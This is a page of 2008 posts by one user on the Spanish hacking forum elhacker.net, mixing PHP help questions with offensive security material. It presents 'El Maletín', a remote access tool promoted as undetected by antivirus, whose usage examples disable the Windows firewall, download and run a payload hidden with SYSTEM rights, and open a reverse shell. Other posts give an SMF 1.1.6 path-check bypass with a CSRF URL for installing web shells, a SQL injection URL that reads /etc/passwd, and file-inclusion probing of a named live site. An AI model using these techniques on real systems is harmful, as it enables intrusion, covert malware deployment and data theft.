elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Temas
Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42
371  Programación / PHP / Reemplazar funciones en: 6 Diciembre 2008, 22:19 pm
Una pregunta poco común, alguien sabe como podría intercambiar funciones y reemplazar una función por otra?

Por ejemplo que la función eval() funcione como si fuera printf()  :xD bueno con eso ya deben saber para que es, la idea es descifrar un cifrado que hace una librería de php que según yo debe ejecutar todo el buffer final en un eval.

estuve pensando que talves pueda hacerse con ini_set pero no me funcionó, redeclarando funciones tampoco, talves hay que establecer un unset a una función o algo así aver si alguien sabe.

De antemano grax.
372  Programación / PHP / [Proyecto] El Maletín (Fuente) en: 17 Noviembre 2008, 21:34 pm
El maletín 1.2 Beta

Bueno, este no es un script para una web, sino la fuente para un archivo binario ejecutable para Win32.

Ahora ustedes dirán:
Citar
:o de php a exe??
Así es, con el BamCompiler.

De que se trata?... Es un software de administración remota donde la idea es que contenga todas las herramientas mas simples y necesarias para la buena y cómoda administración de una shell remota.

Expongo acá su código fuente para ver si me pueden apoyar en algunas lineas y dar ideas, etc.

Si alguien quiere ofrecerse de BetaTester pueden hacerlo en el subforo de "Análisis de malware".

La idea principal de este software es poder hacer pruebas localmente o remotamente pidiendoles la cooperación de la persona involucrada tal como se los estoy pidiendo yo, en ningún caso debe utilizarse para administrar un sistema que no sea de nuestra propiedad o sin el concentimiento de su dueño. Esto es para evitar problemas legales y poder comprender como protegernos ante ataques remotos sin la necesidad de presindir por el antivirus ya que hasta la fecha no es detectado por ningún sistema antimalware ni antivirus a exepción ovbiamente de los Firewalls, aunque con unas pequeñas funciones pueden deshabilitarse tal como lo programé para el firewall de Windows XP y Vista.

Descargar Fuente

Como pueden ver muchas de las funciones están sin crear ya que en php no hay Handle que puedas utilizar para alguna función, por lo cual me veo casi obligado a utilizar softwares externos como por ejemplo "REG" y "wmic".

Binario y Pruebas con el binario en este subforo:
http://foro.elhacker.net/analisis_y_diseno_de_malware/proyecto_el_maletin-t234529.0.html
373  Seguridad Informática / Abril negro / [Proyecto] El Maletín (Binario) en: 10 Noviembre 2008, 02:28 am
El maletín



Versión 1.3 Beta - Descargar acá

Código Fuente: https://foro.elhacker.net/php/proyecto_el_maletin_fuente-t235451.0.html

Antes que nada quiero aclarar que esta herramienta es para "Administración Remota" de código libre por lo tanto no viola ningún tipo de norma legal.
Está demás decir que solo se permite su ejecución en un ambiente controlado donde el propietario de la pc controlada tenga consiencia del hecho.



¿De que se trata?

  • Es un software que tiene todas las herramientas mas útiles al momento de ingresar en un sistema en modo consola debido a que no depende de un modo gráfico (GUI).
  • Entre algunas opciones El Maletín permite la codificación y decodificación de múltiples algoritmos como MD5 y Base64.
  • También permite la ejecución de comandos en modo "SYSTEM NT AUTORITY" accediendo a un nivel mas alto que el propio administrador accediendo a la manipulación de servicios del sistema entre otros. El Maletín tiene la capacidad de ejecutar estos comandos en modo de interacción con el escritorio y sin el, en otras palabras oculto o segundo plano.
  • Contiene un sistema de descarga de archivos remotos tales como archivos de websites (Downloader).
  • Tiene la capacidad de realizar la administración remotamente sin la necesidad de sistemas remotos extras tales como Netcat, Telnet y SSH debido a que incorpora un sistema de conexión pipeada atraves de Sockets.
  • Tiene la capacidad de crear o eliminar extensiones de archivos ejecutables, por ejemplo hacer que un archivo .jpg se comporte como un .exe tal cual lo hace "Extension Creator" pero con la diferencia de tener la posibilidad de revertir este efecto.
  • También es capaz de habilitar o deshabilitar el Firewall de Windows que viene por defecto en Windows XP y Vista en caso de ser necesario como la utilización de la conexión del mismo Maletín.

Citar
D:\Laboratorio\Proyectos\el maletin>mt -hv
→ El Maletin V1.2 Beta por WHK
Uso: mt -[Argumentos] [valores]

-------------------------------------------------------------------------------
Argumento* : v
Descripcion: Activa el modo verbose.
-------------------------------------------------------------------------------
Argumento* : !v
Descripcion: Desactiva todos los mensajes.
-------------------------------------------------------------------------------
Argumento  : h
Descripcion: Visualiza la ayuda.
-------------------------------------------------------------------------------
Argumento  : md5 [buffer]
Descripcion: Cifra el buffer basado en el algoritmo MD5.
-------------------------------------------------------------------------------
Argumento  : b64e [buffer]
Descripcion: Cifra el buffer basado en el algoritmo Base64.
-------------------------------------------------------------------------------
Argumento  : b64d [buffer]
Descripcion: Descifra el buffer basado en el algoritmo Base64.
-------------------------------------------------------------------------------
Argumento  : d [URL] [Salida]
Descripcion: Descarga un archivo desde una URL basado en el protocolo HTTP,
             HTTPS y FTP. Si se omite [Salida] se guardara con su nombre
             original.
-------------------------------------------------------------------------------
Argumento  : i [Direccion IP] [Puerto]
Descripcion: conexión inversa que permite manipular remotamente una Shell
             desde un servidor especificando su direccion Ip y Puerto.
-------------------------------------------------------------------------------
Argumento  : e [Comandos]
Descripcion: Ejecuta los comandos deseados dentro de la Shell.
-------------------------------------------------------------------------------
Argumento  : esi [Comandos]
Descripcion: Ejecuta los comandos deseados dentro de la Shell con derechos del
             sistema (NT Autority) en modo interactivo con el escritorio.
-------------------------------------------------------------------------------
Argumento  : esb [Comandos]
Descripcion: Ejecuta los comandos deseados dentro de la Shell con derechos del
             sistema (NT Autority) en modo background (segundo plano o
             invisible).
-------------------------------------------------------------------------------
Argumento  : ext [extensión]
Descripcion: Establece la extensión como ejecutable.
-------------------------------------------------------------------------------
Argumento  : fw [Modo]
Descripcion: Modo=[on - off] Habilitar/Deshabilitar firewall de Windows
-------------------------------------------------------------------------------
Argumento  : unext [extensión]
Descripcion: Elimina la extensión ejecutable.
-------------------------------------------------------------------------------
Argumento  : -info
Descripcion: Despliega la informacion completa del sistema.
-------------------------------------------------------------------------------
(*) = Puede ejecutarse simultaneamente adicionalmente sobre otros argumentos
Ejemplos:
→ mt -md5 Palabras con espacios... > buffer.log
→ mt -b64d < codificado.reg > decodificado.txt
→ mt -b64e < bin.exe > bin_cifrado.exe
→ type texto.txt | mt -b64e > cifrado.txt
→ mt -fw off&&cd %%tmp%%&&md IO&&cd IO&&mt -d http://host/vnc.packed IO.packed
→ copy mt.exe %tmp%\mt.exe && mt -!vesb %tmp%\mt -d!v http://host/script.dat scr
ipt ^&^& mt ^< script && del /f /q mt.exe && exit
En el caso de asignar un [buffer] este puede ser establecido con espacios en bla
nco sin la necesidad de encerrarlos en comillas ya que estas se consideraran par
te del mismo buffer.

D:\Laboratorio\Proyectos\el maletin>
374  Seguridad Informática / Nivel Web / SMF 1.1.6 multiples fallas en: 6 Noviembre 2008, 09:00 am
Simple Machines Forum (SMF) 1.1.6 Code Execution Exploit
http://milw0rm.com/exploits/6993

Simple Machines Forum <= 1.1.6 (LFI) Code Execution Exploit
http://milw0rm.com/exploits/7011

En ambos casos es posible causar la ejecución de códigos o subir directamente una shell como un r57 o un c99 aunque es necesario que el atacante pueda subir archivos adjunto en un post para poder ejecutar cualquiera de estos dos exploits donde uno se trata de un LFI y el otro de paquetes autoinstalables sin la verificación de un sesc.

En el primer exploit aparece lo siguiente:
Citar
$this->url->package = '../attachments/' . $this->url->package;
SMF te devolverá un error ya que filtra si alguien intenta escapar del directorio de paquetes, modificamos por lo siguiente:
Citar
$this->url->package = './../attachments/' . $this->url->package;
Solo verifica que los primeros tres carácteres no sean '../' asi que le anteponemos './' y ya.

También descubrí otro bypass que permite instalar paquetes sin verificar la extension del archivo, ahora dicen 'para que sirve?'... supongamos que nuestro foro objetivo solo deja subir archivos jpg, renombramos el paquete con la shell a *.jpg y listo, luego decimos las palabras mágicas..
http://127.0.0.1/foro/index.php?action=packages;sa=install2;package=... ...test.jpg
dentro de un xsrf ovbio hacia el admin y ya está instalado bypaseando el path antihacking  :P y la extensión del archivo.

Algo muy curioso es que después de tres dias nadie se haya dado cuenta, ni los de simplemachines ya que no hay parche ni post en la sección de bugs ni en ninguna otra comunidad.

No pierdan el tiempo, ya probé con foros amigos y no dejan subir nada  :P
El admin de este foro ya tomó las medidas necesarias para evitar catastrofes  :xD
375  Programación / PHP / $_POST no funciona en: 2 Noviembre 2008, 16:31 pm
Hola, tengo un problema en mi servidor y es que no funciona el array $_POST, como yo no soy el único que manipula los archivos de configuraciones no se que pudo haber pasado.
Talvés algo en la configuración del PHP o del Apache no lo sé.

Cuando intento ingresar en algún sistema del servidor como por ejemplo en el phpmyadmin no me deja y probando lo siguiente:
Código
  1. $probar = array($_COOKIE,$_POST);
  2.  
  3. for($cuenta=0;$cuenta<count($probar);$cuenta++){
  4. if($probar[$cuenta] == $_COOKIE){
  5.  $array = '$_COOKIE';
  6. }else{
  7.  $array = '$_POST';
  8. }
  9. foreach($probar[$cuenta] as $variable => $valor){
  10.   echo '<br />Arrays: '.$array.' Variable: '.$variable.' Valor: '.$valor.'<br />';
  11. }
  12. }
  13.  
  14. exit(0);

Me aparecen las cookies pero la petición POST para loguearme no.

Ahora lo pruebo directamente:
Código
  1. echo 'pma_username : '.$_POST['pma_username'].'<br />';
  2. echo 'pma_password : '.$_POST['pma_password'].'<br />';

Y nada:
Citar
pma_username :
pma_password :

Alguien sabe que pudo probocar que el array $_POST deje de funcionar?
No quiero reestablecer los archivos de configuración porque son demasiados cambios y muchos procesos asociados a el y creo que esta sería algo así como la última opción.

Gracias.
376  Programación / PHP / Seleccionar el valor mas alto de una columna en MySQL en: 26 Octubre 2008, 22:21 pm
Estoy atascado en una función que necesito crear, la idea es poder debolver el valor mas alto que aparezca en la columna 'id', para eso lo que hize fue seleccionar todo, ordenar con sort() y tomar el último valor, pero la idea es que no seleccione todo ya que sería una carga innecesaria hacia la base de datos, tampoco me sirve contar con mysql_num_rows() porque a veces los ids se eliminan y quedan sin un orden fijo.

Alguna idea?

es para un brigde en smf que estoy haciendo y no quiero duplicar un id member
377  Programación / PHP / [Proyecto] GreenCode-Coder V1.1.3 en: 8 Octubre 2008, 23:22 pm
Hola, estoy haciendo un codificador de múltiples algoritmos parecido al sneak (vease sneak) pero creando cada función yo mismo.

Quería saber si alguien desea aportar al proyecto y poder aprender cada ves mas de forma unida.

La fuente la dejo => acá
y el demo => acá

La idea es hacer un solo codificador y decodificador para cualquier tipo de tarea que necesitemos.

La conversión puede ser en cualquier formato que pueda ser escrito o descargado.

Si alguien quiere dar algún aporte aparecerá en el readme que integraré cuando lo suba a sourceforge.


V1.1.3 Conversiones soportadas: 21 (11/10/2008)

  • Ascii a Base64
  • Ascii a decimal
  • Ascii a Hexadecimal
  • Ascii a HTML (con semicolones)
  • Ascii a HTML (sin semicolones)
  • Ascii a HTMLSpecialChars
  • Ascii a MD5
  • Ascii a Octal
  • Ascii a PHP(Base64+GZ+Hexa)
  • Ascii a PNG PHP
  • Ascii a Sha1
  • Ascii a SQLi DWord(0x00)
  • Ascii a SQLi Char(dec)
  • Ascii a Unescape javascript
  • Ascii a Urlencode
  • Base64 a Ascii
  • Hexadecimal a Decimal
  • Octal a Decimal
  • PHP(Base64+GZ+Hexa) a Ascii
  • Protección de código PHP
  • Urlencode a Ascii
  • Hexadecimal a Ascii
  • Ascii a Binario IO
  • Binario IO a Ascii
  • Decimal a Ascii
  • htmlspecialchars_decode
  • Decimal a octal
  • Generar htpasswd md5
  • Generar htpasswd sha
  • Generar htpasswd crypt

Ejemplo
ASCII a SQLi DWord(0x00) =>
../../../../../etc/passwd =>
funcion(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)

Uso
Código:
http://www.site.com/?page_id=-1+union+select+1,load_file(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764),3


Ideas, aportes, opiniones, criticas contructivas y no constructivas?¿?
378  Seguridad Informática / Nivel Web / SMF 1.1.6 Filter Post Bypass en: 4 Octubre 2008, 10:15 am
Bueno en realidad esto lo pude descubrir o redescubrir pero hasta ahora nadie lo ha posteado en ningún lado, se trata sobre un sistema de foros llamado Simple Machines Forum donde puedes administrar el tipo de contenido que puede tener el foro, por ejemplo puedes evitar entre comillas que alguier escriba la palabra "fuck" o "n00b", etc pero es muy facil de sobrepasar tal sistema de seguridad:

   
Código:
fu[b][/b]ck you!

El problema está en que SMF no verifica si algún BBCode es núlo insertando divisiones de estilos en el post y en algunos casos sin ser cerrados causando un pequeño deface en la página evitando filtros de spam y control de palabras.

En algunos casos sitios webs donde debes registrarte para ver los links puedes utilizar esta técnica para bypasear su MOD que impide su visualización interrumpiendo los carácteres "http://"

Aquí una demostración:



Fuente:
http://www.jccharry.com/blog/2008/10/04/whk_smf-116-filter-post-bypass.html
http://milw0rm.com/exploits/6665
379  Programación / PHP / Incluir un php en todas las páginas? en: 14 Septiembre 2008, 22:53 pm
Hola,
Necesito saber si alguien sabe como puedo incluir un archivo php en todas las demás páginas.. me explico..

La idea es que al hacer una petición GET a un php este comienze automáticamente incluyendo el archivo 1.php como cabecera y después que se ejecute el resto.

Habrá alguna configuración en htaccess para que haga esto? con el mod rewrite no puedo porque estoy utilizando permalinks en algunas partes de mi servidor y necesito que un sistema de logueo se encargue de filtrar todas las peticiones que pasen por ellas, blog, portal, todo. La idewa es no hacer un include a todo ya que hay páginas que no siempre son index.php y tendría que modificarlos cada ves que salga alguna actualización de ellos.

Algo así como lo hace iespana que cuando ves un archivo html te incrusta su publicidad arriba automáticamente sea cual sea la página si es html.
380  Seguridad Informática / Nivel Web / Posible inclusión remota de archivos en MKPortal en: 7 Septiembre 2008, 20:24 pm
Estaba mirando el sitio oficial de mkportal y pude ver que para visualizar una sección utiliza inclusiones hacia el archivo con el nombre de la variable "show" + .php
Por ejemplo:
Código:
http://www.mkportal.es/mkportal/modules/docs/index.php?show=copyright

En realidad está haciendo una inclusión hacia:
Código:
http://www.mkportal.es/mkportal/modules/docs/content/copyright.php

En el cual no verifica si realmente puede ser incluido o existe aquella página como se ve en el siguiente ejemplo:
Código:
http://www.mkportal.es/mkportal/modules/docs/index.php?show=fuck
Citar
Warning: require_once(content/fuck.php) [function.require-once]: failed to open stream: No such file or directory in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Fatal error: require_once() [function.require]: Failed opening required 'content/fuck.php' (include_path='.:/usr/local/lib/php') in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Y si hacemos una petición GET directamente a un archivo nos resulta..
Código:
http://www.mkportal.es/mkportal/modules/docs/content/copyright.php
Citar
Fatal error: Class 'module' not found in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/content/copyright.php on line 6

Aumentando las probabilidades de una inclusión remota o talves solo local. Probé inyectando null bytes para evadir la extensión pero no fue posible, si ingresas un punto, slqsh o algún caracter que no sea número o letra te lo toma como nó válido, a exepción de un byte nulo como "%00" asi que el resto será solo cosa de imaginación.

REFERENCIA:
http://www.jccharry.com/fake/1.txt
Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines